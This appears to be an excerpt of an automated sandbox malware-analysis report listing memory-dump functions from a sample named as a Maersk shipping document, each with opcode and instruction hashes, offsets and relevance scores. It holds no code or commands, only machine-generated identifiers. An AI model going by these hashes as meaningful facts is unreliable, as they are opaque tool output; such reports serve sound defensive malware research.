                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cc17e7fc26a1a3e4ca722197e028dcecdca1a81085a77534cf3c5f2c24bcb5fe
                                                    • Instruction ID: 7dba36cd37d94c58d9d8b599561f3d3d097e8cbd94797d9edef5fafdb10e7951
                                                    • Opcode Fuzzy Hash: cc17e7fc26a1a3e4ca722197e028dcecdca1a81085a77534cf3c5f2c24bcb5fe
                                                    • Instruction Fuzzy Hash: E541C2B1B58216DFEB118BAAC8C5ABEB7F1FF45304F40C026E15B97250C735A9468B12
                                                    Function 07C47A46 Relevance: .1, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5ca26356706ddf32580b8d477157f2df03523a33f57ff99833591c00f2a39127
                                                    • Instruction ID: d0e22ebcfaee50f8324355169796826d196bf7c34c84b6f1a89b767f55ebdbf7
                                                    • Opcode Fuzzy Hash: 5ca26356706ddf32580b8d477157f2df03523a33f57ff99833591c00f2a39127
                                                    • Instruction Fuzzy Hash: E041F5B1A1C3918FC7159B79982817EBFB1EB8A211F1406ABD443C72A7DB340D49C7A2
                                                    Function 07C41198 Relevance: .1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d73f7f716450255a8dac71c45af86f96287ab5188cb828ae057e01e7af73e13a
                                                    • Instruction ID: ce423f41fae5d261a32a47098af9500c19dd2de97a25c8caaa1c227e18d04c57
                                                    • Opcode Fuzzy Hash: d73f7f716450255a8dac71c45af86f96287ab5188cb828ae057e01e7af73e13a
                                                    • Instruction Fuzzy Hash: 4931AEB1A10219DFDB14DFA9D94499DBBF6FF88310F14822AE501E7364EB709C45CB91
                                                    Function 07C46AFC Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a73a5702bd7ad8c921a407434ca9681e6a878eb749991c1b2032027a8b2a6b3f
                                                    • Instruction ID: 36dd8225c54f56327c871b9a3dd184e992d8598b0ea5ffd9878ca2a44661c225
                                                    • Opcode Fuzzy Hash: a73a5702bd7ad8c921a407434ca9681e6a878eb749991c1b2032027a8b2a6b3f
                                                    • Instruction Fuzzy Hash: 6B31E5B0614109CFD7249F59C4907AABBB5EB8B328F14842AC416BB349CB35DD468B91
                                                    Function 07C4A2E0 Relevance: .1, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 54bd8d63574a62a210e094e856a229eaeaa5a126bfba51316751a76e582b5f0e
                                                    • Instruction ID: 33af58699ef87615d4f24088767bf1f25463d3c36eb8be4abb1399caa06b8eff
                                                    • Opcode Fuzzy Hash: 54bd8d63574a62a210e094e856a229eaeaa5a126bfba51316751a76e582b5f0e
                                                    • Instruction Fuzzy Hash: D23138B2900209AFCF10DFA9D884A9EBFF5FF48310F10846AE909A7211D735A955CBA0
                                                    Function 07C42D88 Relevance: .1, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fa3afa0f7c610ffb6798f9cd1dcf5b788733b10d476a8b76a881948fc0119888
                                                    • Instruction ID: 3ae281d30b970552ff03ab7e4c5a53add3d5e729bba1dfb365eeb4b1b91621bc
                                                    • Opcode Fuzzy Hash: fa3afa0f7c610ffb6798f9cd1dcf5b788733b10d476a8b76a881948fc0119888
                                                    • Instruction Fuzzy Hash: F431CFB1A01205AFDB14DF65D845BAEBBF6FF88311F10892AF406AB290DB74DD44CB90
                                                    Function 07C4C1A1 Relevance: .1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 90f9a0875119bf4db62eeb64e3f6e8bf8a656ab8a6b32474f5fb8758fc0123aa
                                                    • Instruction ID: 19d0351ea69e7081bf4a420c0473e04fb2e6a6f3cbf508cc58111a921eedfd59
                                                    • Opcode Fuzzy Hash: 90f9a0875119bf4db62eeb64e3f6e8bf8a656ab8a6b32474f5fb8758fc0123aa
                                                    • Instruction Fuzzy Hash: 9D31E8F0A2F152CBC7308AEEC890379B7B0AB47210F048177D516C72B5C6A88915C7B6
                                                    Function 07C417F0 Relevance: .1, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e70b0c06f342946e01d074ed0f04825e759cd2330bdfcbeb8144481d7bdfe1c
                                                    • Instruction ID: 5384f6533f81168e0cbc264d1cb101bd7fe96ed57b7dc92fe624cf7fe8dfd132
                                                    • Opcode Fuzzy Hash: 6e70b0c06f342946e01d074ed0f04825e759cd2330bdfcbeb8144481d7bdfe1c
                                                    • Instruction Fuzzy Hash: 5331D2B4A1130A9FDB24CF65D954AAD7BF6AF89301F284129E442D3251CF30C980CB52
                                                    Function 07C422F0 Relevance: .1, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bfa0e6c69e820f91570b3c580c5da1ba1a7e72d87c97f3d040e8abc638c702ad
                                                    • Instruction ID: 4b3d157bf5d8359e3983b4d3a77b3a9e87e5773b1b856fe05697c6abc6546073
                                                    • Opcode Fuzzy Hash: bfa0e6c69e820f91570b3c580c5da1ba1a7e72d87c97f3d040e8abc638c702ad
                                                    • Instruction Fuzzy Hash: 2D3169713052019FD758DF69E8C1A6A77FAFB8A220F148469E909CB369DF30EC458B61
                                                    Function 07C46B44 Relevance: .1, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40a3af06c8847263d7be1be0b743c886ee607139ea6bc6df491d3b2ccd9d8c5e
                                                    • Instruction ID: 7025342bb680b43e73dfcb5f83fb5ec0a32503d68568484387c897c3b49b2dd7
                                                    • Opcode Fuzzy Hash: 40a3af06c8847263d7be1be0b743c886ee607139ea6bc6df491d3b2ccd9d8c5e
                                                    • Instruction Fuzzy Hash: 6A3102B0604105CFD764DF59D4907AABBF5FB8B328F14846AC01ABB389CB399D46CB90
                                                    Function 07C4C308 Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e264a761f534efffe429aa076e9b1098b0e32544f585f0aa212c4a8290cf28f6
                                                    • Instruction ID: 80bce1fd9e5429dd8b1f0664e6597ab1ad81630f694c885daa57cf7c30265dfe
                                                    • Opcode Fuzzy Hash: e264a761f534efffe429aa076e9b1098b0e32544f585f0aa212c4a8290cf28f6
                                                    • Instruction Fuzzy Hash: E72102B471B105DBD7388A1A89406B977A7BBC6724F24842AD4078B2B9DA75CC02877A
                                                    Function 07C46568 Relevance: .1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8e93cafbe6262ead92bd19102fa79d3e3f18247e7c938de3ca69239cb73a7d21
                                                    • Instruction ID: 657324677354e6a5d9a8f0b0a5d63152063a0ad02d851f58d3185cd0e606046f
                                                    • Opcode Fuzzy Hash: 8e93cafbe6262ead92bd19102fa79d3e3f18247e7c938de3ca69239cb73a7d21
                                                    • Instruction Fuzzy Hash: A031E3B4E1020AAFCF44DFA9D9805EEBBF6FF49310F104469D515FB258EB309A448BA0
                                                    Function 07C40FC0 Relevance: .1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cec8677abef7ca2e87595004632af8b249781975c6df5fa22ec0d5a9ad137d11
                                                    • Instruction ID: 2e08c351bef7a024d144aed7ff5331a173b43bbe1c9f747cc9b8d6739be93d4e
                                                    • Opcode Fuzzy Hash: cec8677abef7ca2e87595004632af8b249781975c6df5fa22ec0d5a9ad137d11
                                                    • Instruction Fuzzy Hash: 20314535A10609DFCB05EFA8C8548EDBBB5FF89300F05865AE5056B325FB70A989CB91
                                                    Function 07C429E0 Relevance: .1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2cb4efdfc1722346cca8a0426fb9a044f39f28d4f0827803379671c7c583d94
                                                    • Instruction ID: ea194dcba0bf3997a5cb104d8635d14e638a6ca68a174daad53d9bd67af855bc
                                                    • Opcode Fuzzy Hash: b2cb4efdfc1722346cca8a0426fb9a044f39f28d4f0827803379671c7c583d94
                                                    • Instruction Fuzzy Hash: A121A475701106CFEB10DFA5E685BAAB7F9FB49361F004029F819D7240DB30D945CBA1
                                                    Function 07C46559 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 304637abc80ee239d45ec68bd6c4c90a69a8e4c8616c8237b45d25d0e31fd9e5
                                                    • Instruction ID: c0188d4b4ad41d032ea382bbdb1828bbbfccd1c1de417e7a3d60111f276fe361
                                                    • Opcode Fuzzy Hash: 304637abc80ee239d45ec68bd6c4c90a69a8e4c8616c8237b45d25d0e31fd9e5
                                                    • Instruction Fuzzy Hash: B831F0B0E1020AAFCB41DFA9D8916EEBBF5BF49310F104566D401FB258E7349A448BA1
                                                    Function 0156D56C Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1335281506.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_156d000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 437ca8f08847599b1f1c54f061a611e4b473253f57b552f00eb8743273de2909
                                                    • Instruction ID: ae9bf91c50dde9a206ea4b49eea93ff67511bc0d610778ccd1375c59c80f18f3
                                                    • Opcode Fuzzy Hash: 437ca8f08847599b1f1c54f061a611e4b473253f57b552f00eb8743273de2909
                                                    • Instruction Fuzzy Hash: 79212571604204DFDB05DF98D9C0B2ABFB9FB98314F24C969E9494F256C336D816CAE1
                                                    Function 07C40290 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fc5e9df9c90b1243e0a9d00680e4fa0399c13d1b0de8bf7bcb42668387c5569f
                                                    • Instruction ID: fe69cac474b7a703a3def7e262358f0e40a9f71d57f133787b45127000a8ac95
                                                    • Opcode Fuzzy Hash: fc5e9df9c90b1243e0a9d00680e4fa0399c13d1b0de8bf7bcb42668387c5569f
                                                    • Instruction Fuzzy Hash: 1F218675B102058FCF44DF69CD948AEBBB5FF89200700856EE905E7351EB70D945CBA0
                                                    Function 0157D1B4 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1335339347.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_157d000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2b237f1dfcffbe9ba5eab1775edf93c089eed2010efa5920ff869d49cd798aea
                                                    • Instruction ID: 70f02490f6f96aae09b34e92be6f1fd063b7242891376b1b7ad269548df41d63
                                                    • Opcode Fuzzy Hash: 2b237f1dfcffbe9ba5eab1775edf93c089eed2010efa5920ff869d49cd798aea
                                                    • Instruction Fuzzy Hash: CB21F2716042049FDB05DF98E5C1B2ABBB5FF84324F24C9ADE84A4F256C336D806CA61
                                                    Function 0157D36C Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1335339347.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_157d000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c296f70f864378c962dd345ba4ba6b34bf83aa74a6d202821c1fb37414454ba
                                                    • Instruction ID: efe53077ce823b7de1c31421c0d90c8b545367ea12a3794c58d8b9314c374276
                                                    • Opcode Fuzzy Hash: 6c296f70f864378c962dd345ba4ba6b34bf83aa74a6d202821c1fb37414454ba
                                                    • Instruction Fuzzy Hash: 2F213771504204DFCB01CF98E5C5B26BBB6FF84314F24C56DE8094F256C376E446CA61
                                                    Function 07C402A0 Relevance: .1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d61aa7a441948a4ee19ae437c520955de3e557239e60043a49d0f00913f5a520
                                                    • Instruction ID: 583ca7d712c803b6d6f1256c38478ee3057f6e1fa60017dd440e59433291ce37
                                                    • Opcode Fuzzy Hash: d61aa7a441948a4ee19ae437c520955de3e557239e60043a49d0f00913f5a520
                                                    • Instruction Fuzzy Hash: 9D213275A1020A8FCF44EF69C8948AEF7B5FF88300B518569D905F7351EB70A945CBA0
                                                    Function 07C4C536 Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: abc6d4f64e6cca0a7309a1e7e0fee3e1d14e109953dddf6b01ac438c67631488
                                                    • Instruction ID: 42692d951b235fe998b82b6eb7488a123e6af4e6d84a196f708bd97782fa7ffe
                                                    • Opcode Fuzzy Hash: abc6d4f64e6cca0a7309a1e7e0fee3e1d14e109953dddf6b01ac438c67631488
                                                    • Instruction Fuzzy Hash: 3E2184F1E2BD15C7D734CA2AC94067DB7B1AB4B310F005217A512C72B0C774E5A0AB76
                                                    Function 07C43FC8 Relevance: .1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: db106e6f1224742b792599ac0533d2fbb7a7a718d41f837c333e16d58c61afa5
                                                    • Instruction ID: ec6111d3ba884f54bbb8bbb3311aa8ddba1c55de557fe65b4fde3565d80ccae3
                                                    • Opcode Fuzzy Hash: db106e6f1224742b792599ac0533d2fbb7a7a718d41f837c333e16d58c61afa5
                                                    • Instruction Fuzzy Hash: FD1102717047545BC7259BBE9850AAFBFEAAFC5620F0444ABE449D7382ED609C0283E1
                                                    Function 07C429D0 Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 512a221674ea1d595109b1338b9f2e3ec977f65f272506ad8caf34359174ae2c
                                                    • Instruction ID: fbc29c001cf9f0bd8e280685c8cb3adead77472c34ed37e8a3fd696397e99c58
                                                    • Opcode Fuzzy Hash: 512a221674ea1d595109b1338b9f2e3ec977f65f272506ad8caf34359174ae2c
                                                    • Instruction Fuzzy Hash: 5711D3B17006028FDB10CB65E585BAABBF9FB49361F044129F819C7385EB70DD45CBA1
                                                    Function 07C459F4 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7bc44a90e463fcf797e7efe3fd397dde201f14559bb6ba42f8d8b967fbebf9e9
                                                    • Instruction ID: c32e224061bd02cec507ffba97a35d5d51b90e836eedabd859723c7f1181b923
                                                    • Opcode Fuzzy Hash: 7bc44a90e463fcf797e7efe3fd397dde201f14559bb6ba42f8d8b967fbebf9e9
                                                    • Instruction Fuzzy Hash: EB21D0B5900349AFCB10DF9AD884ADEBFF5FB49310F50841AE919A7210D375A954CFA1
                                                    Function 0156D567 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1335281506.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_156d000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                    • Instruction ID: daa5df3ee588271e62922fdc48035804f9c220e25850a3772df524664480b24a
                                                    • Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                    • Instruction Fuzzy Hash: 4C11DF72504240CFCB12CF44D9C4B1ABF72FB88314F24C6A9D8490B257C336D85ACBA1
                                                    Function 07C4A2A8 Relevance: .1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8c7ddbe476df100ff9878bdb50d6a1a7fdd7b3fcbfe91ea1d0cde428f0095966
                                                    • Instruction ID: cfe0fd2578c717d5052f09507a6dfcb87f47b5ad0578408709c31275255a79a5
                                                    • Opcode Fuzzy Hash: 8c7ddbe476df100ff9878bdb50d6a1a7fdd7b3fcbfe91ea1d0cde428f0095966
                                                    • Instruction Fuzzy Hash: A811CC725092916FCB12CB68E8A18DA7FB5EF0622471980D7D084CB163E6308A1AD362
                                                    Function 0157D367 Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1335339347.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_157d000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                    • Instruction ID: adbc97a25ce36cefb4c9a8ee6dd056fc75196e855201c77801c54190eac56320
                                                    • Opcode Fuzzy Hash: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                    • Instruction Fuzzy Hash: 1511BE75504240CFDB02CF54E5C4B19BB72FF84214F24C6A9D8094F656C37AE44ACB51
                                                    Function 0157D1AF Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1335339347.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_157d000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                    • Instruction ID: d99e6c9681ef98452cf35e71c403cd27435d6a6661ca275999f11f9c18ad4e86
                                                    • Opcode Fuzzy Hash: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                    • Instruction Fuzzy Hash: 32118B75504284DFDB06CF54D5C4B19BFB2FF84224F28C6A9E8494F656C33AD44ACBA1
                                                    Function 07C44DD0 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 914e08de44aea547cb24c0cd71544fccf600a96f20c7c6f450ed547808a6c9f4
                                                    • Instruction ID: 7e0454d938d6baf7da86de5c7e9ab8e3fb95adac434c61eaea854a66fcdd127b
                                                    • Opcode Fuzzy Hash: 914e08de44aea547cb24c0cd71544fccf600a96f20c7c6f450ed547808a6c9f4
                                                    • Instruction Fuzzy Hash: 260136366052556FCB065F59AC4489EFFB5FF88221710812BF915C3352DB318D25DB91
                                                    Function 07C42800 Relevance: .0, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9ad35eaced199c50f1e9774df8216d7df1e3f4b11762e90ca8893c180cf19285
                                                    • Instruction ID: 628f8fbf82a4dada0581450483afa21a9e6fbcca5189f3b8f82d2a53098c834a
                                                    • Opcode Fuzzy Hash: 9ad35eaced199c50f1e9774df8216d7df1e3f4b11762e90ca8893c180cf19285
                                                    • Instruction Fuzzy Hash: 2EF0C2323042009FC3169F29F404A96BFA5EBD9722B10C03FE149C7241CF31C815CBA0
                                                    Function 07C48F1C Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 986b7a2875e0f4d254f27ffc693ee42aa08150de72360ae8a8ee7999ed6582cf
                                                    • Instruction ID: 53043dc18b2bf47965bbff74e3bcebb3b0b4f0682862a43d462fbe2f36872089
                                                    • Opcode Fuzzy Hash: 986b7a2875e0f4d254f27ffc693ee42aa08150de72360ae8a8ee7999ed6582cf
                                                    • Instruction Fuzzy Hash: 67F024E582D290EFD30197AA58500B57FF1EDAB200B1401CBD587CB567E2288819D36B
                                                    Function 07C44DE0 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
